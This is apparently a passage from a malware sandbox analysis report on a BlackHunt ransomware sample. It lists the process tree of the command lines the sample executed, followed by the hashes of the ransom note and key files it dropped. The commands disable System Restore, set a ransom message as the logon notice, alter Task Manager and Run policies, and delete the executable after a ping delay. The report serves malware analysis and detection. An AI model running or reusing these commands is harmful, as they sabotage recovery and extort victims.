                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3232
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                                              3⤵
                                                                                                                                                                PID:672
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                                                                                              2⤵
                                                                                                                                                                PID:272
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:1900
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:1884
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2668
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:3880
                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                          SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:1048
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4036
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2744
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1112
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:2796
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2924
                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                      taskkill /IM mshta.exe /f
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:2316
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:3868
                                                                                                                                                                                      • C:\Windows\system32\notepad.exe
                                                                                                                                                                                        notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1456
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:3696
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\ec30512a57d1e93a0ee462a48a5a7d0a752505abdea31c4ed35d24b3ce5c47af.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Deletes itself
                                                                                                                                                                                          PID:3672
                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                            ping 127.0.0.1 -n 5
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                            PID:2688
                                                                                                                                                                                      • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                        C:\Windows\system32\vssvc.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:3080
                                                                                                                                                                                      • C:\Windows\system32\wbengine.exe
                                                                                                                                                                                        "C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:3588
                                                                                                                                                                                      • C:\Windows\System32\vdsldr.exe
                                                                                                                                                                                        C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1336
                                                                                                                                                                                        • C:\Windows\System32\vds.exe
                                                                                                                                                                                          C:\Windows\System32\vds.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:1204
                                                                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:2864

                                                                                                                                                                                            Network

                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                            Downloads

                                                                                                                                                                                            • C:\#BlackHunt_ReadMe.hta

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              8KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              c31c0c1ef568bbae9ce8f711a70e4525

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              e14a9eee7d628ee5c895b8ee961493ea00a1ca45

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              bc87fbcd50a974b1fccab3645806e523b48fb7223513f0909713abb9ba0b4736

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              3392b44a149eff5feed5b9e2512a24cf79b19ca51f319360172c53431b65f425ab2b51e9fc1ab0b1dcdc5351021294dd8915a2df3ee3999bffddb759107893ac

                                                                                                                                                                                            • C:\ProgramData\#BlackHunt_Private.key

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              6086e91cfb2da845050e814b5138b6c5

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              2a36c6e985053802adbf6ef5b406339f19bfa472

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              df9969b55632fc7d00abf7251eeb7bb2b265c72505838c5405c39b81bf7d6a1f

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              1c285ee63d3cd533d902290550e7d397d3b49303e012fae9bd2663238bcfe411401337efc295bcdc29685a3c7887cdbe324a519c0d73c5c9ae17403747c49e11

                                                                                                                                                                                            • \Device\HarddiskVolume1\#BlackHunt_ReadMe.txt

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              684B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              6f1a2ded2de3172ecbca68c11c04cb4a

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              aadb65988441d7adcbf7a8619de6e34c9c9b0474

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              3f14370e1f815b170b0a3dd1b895a27b8d6d76550ffe8f67b701b03842584f93

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              07c3237dbd5f26ef76d46be8c4ca4b4b16850db498c8797adfbbd0af2560960bdf1970934163e40cbc630d0c2f1b2fbfd7ff9fa5b9f23130d9ba88b66468d14a